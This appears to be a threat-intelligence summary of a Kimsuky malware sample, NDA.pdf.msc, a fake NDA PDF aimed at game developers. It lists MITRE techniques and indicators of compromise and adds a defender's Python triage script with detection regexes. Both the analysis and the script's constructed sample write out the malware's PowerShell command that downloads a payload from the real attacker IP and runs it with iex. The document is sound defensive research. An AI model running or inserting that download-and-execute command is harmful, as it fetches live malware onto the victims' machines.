North Korea Hacking Group Kimsuky Disguised NDA Document Malware Distribution – NDA.pdf.msc File Warning (2025.5.4)

The article analyzes NDA.pdf.msc, a malware sample attributed to the North Korean hacking group Kimsuky that is disguised as a Non-Disclosure Agreement PDF and targets organizations involved in game development. The file uses PowerShell to download and execute encrypted payloads and hides its console windows to evade detection. #Kimsuky #WindowsSecurity

Keypoints

  • The malware file NDA.pdf.msc appears as a PDF icon but is actually a Microsoft Management Console script (.msc) containing embedded malicious code.
  • The malware uses PowerShell commands to download an encrypted RAR archive and an UnRAR executable from a Netherlands-based IP address and extract the contents with a password.
  • The extracted payload is executed stealthily by hiding PowerShell and Windows Terminal windows using the ShowWindow() API to avoid user detection.
  • The malicious payload is encoded in Base64 and requires multiple decoding layers to reveal its functionality.
  • The malware masquerades as an NDA document related to a blockchain-based game development project by BlockForge Studios LLC, likely to lure game development companies.
  • The malware authors use layered obfuscation and PowerShell execution policy bypass to ensure successful payload delivery and execution.
  • Security vendors detect the malware under various Trojan and downloader classifications, indicating widespread recognition of its threat.

MITRE Techniques

  • (T1204) User Execution: The malware masquerades as a legitimate NDA PDF file to trick users into execution. //NDA.pdf.msc appears as a PDF but is a malicious script disguised to deceive users.//
  • (T1059.001) PowerShell: PowerShell scripts are used for downloading, decoding, extracting, and executing malicious payloads. //iwr -Uri "http://109.107.157.107/kaptsole_x.rar" … iex $dref//
  • (T1027) Obfuscated Files or Information: The malware payload is Base64-encoded three times and requires three decode passes. //Base64-encoded malicious code decoded with CyberChef in three passes.//
  • (T1218) Signed Binary Proxy Execution: A legitimate UnRAR.exe binary is downloaded and executed to extract the malicious archive. //Start-Process -FilePath "$env:TEMP\UnRAR.exe" …//
  • (T1562.001) Impair Defenses: The script hides the PowerShell and Windows Terminal windows so the user does not notice its execution. //The ShowWindow() API is called with SW_HIDE to conceal the PowerShell window.//
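A defender-side triage script for the behaviours listed above, added here as an example and not part of the original analysis. It assumes an .msc lure whose PowerShell command is reachable as a Base64 blob somewhere in the file text (the XML wrapper, the sample command line and the regexes are constructed stand-ins, not the real file layout); it peels the nested Base64 layers, flags the .pdf.msc double extension, and matches the quoted commands against the decoded text.

```python
import base64
import re

# The IP and file names are the page's IoCs; every regex and sample here is constructed.
KNOWN_IP = "109.107.157.107"
DOC_EXTS = {"pdf", "doc", "docx", "hwp", "xls", "xlsx", "ppt", "pptx", "txt"}
INDICATORS = {  # behaviours the analysis attributes to NDA.pdf.msc
    "download_cmdlet": re.compile(r"\b(iwr|Invoke-WebRequest)\b", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", re.I),
    "known_ioc_ip": re.compile(re.escape(KNOWN_IP)),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "policy_bypass": re.compile(r"-(ExecutionPolicy|ep)\s+Bypass", re.I),
    "unrar_drop": re.compile(r"UnRAR\.exe", re.I),
    "window_hiding": re.compile(r"ShowWindow|SW_HIDE|-WindowStyle\s+Hidden", re.I),
}
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def peel_base64(blob: str, max_layers: int = 5) -> tuple:
    """Strip nested Base64 layers (UTF-8, or UTF-16LE as -EncodedCommand uses) while they decode to text."""
    text, layers = blob, 0
    while layers < max_layers:
        try:
            raw = base64.b64decode(text.strip(), validate=True)
            inner = raw.decode("utf-16-le" if b"\x00" in raw[:2] else "utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
            break
        if not raw or not all(c.isprintable() or c.isspace() for c in inner):
            break
        text, layers = inner, layers + 1
    return text, layers

def triage(name: str, content: str) -> dict:
    """Flag the double extension, peel every Base64 blob, and match the behaviour regexes."""
    parts = name.lower().split(".")
    lure = len(parts) >= 3 and parts[-1] == "msc" and parts[-2] in DOC_EXTS
    peeled = [peel_base64(m.group(0)) for m in B64_RE.finditer(content)]
    deepest = max((layers for _, layers in peeled), default=0)
    corpus = content + "\n" + "\n".join(text for text, layers in peeled if layers)
    hits = sorted(key for key, rx in INDICATORS.items() if rx.search(corpus))
    return {"double_extension": lure, "b64_layers": deepest, "hits": hits,
            "suspicious": lure or deepest >= 2 or len(hits) >= 3}

def wrap_layers(text: str, layers: int = 3) -> str:  # constructed helper: triple Base64 wrapping
    for _ in range(layers):
        text = base64.b64encode(text.encode()).decode()
    return text

# Constructed stand-in for the lure: the quoted command chain, triple-wrapped, inside an XML shell.
INNER = 'iwr -Uri "http://109.107.157.107/kaptsole_x.rar" -OutFile "$env:TEMP\\kaptsole_x.rar"; Start-Process -FilePath "$env:TEMP\\UnRAR.exe" -WindowStyle Hidden; iex $dref'
SAMPLE_MSC = f'<?xml version="1.0"?><MMC_ConsoleFile><String>{wrap_layers(INNER)}</String></MMC_ConsoleFile>'
```

Running `triage("NDA.pdf.msc", SAMPLE_MSC)` reports three Base64 layers and six behaviour hits; a plain console file such as `services.msc` with no blob reports none.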

Indicators of Compromise

  • File Hashes (NDA.pdf.msc malware sample): MD5: 51c83329bb364483f122accf36ebfe76, SHA-1: 4ebfb03a1339cb86051ce685c3e09c9435fd8691, SHA-256: bf13fb57e2a0d8e59f9f10dbfc9edf651c70b31f4bea45abf1f085391b162e61
  • IP Addresses (malicious download servers): 109.107.157.107 (Netherlands-hosted server for downloading malware payloads)
  • File Names (used in malware delivery): NDA.pdf.msc (disguised payload), kaptsole_x.rar (encrypted compressed payload), UnRAR.exe (extraction tool), kaptsole_x.txt (decoded PowerShell script)


Read more: https://wezard4u.tistory.com/429482
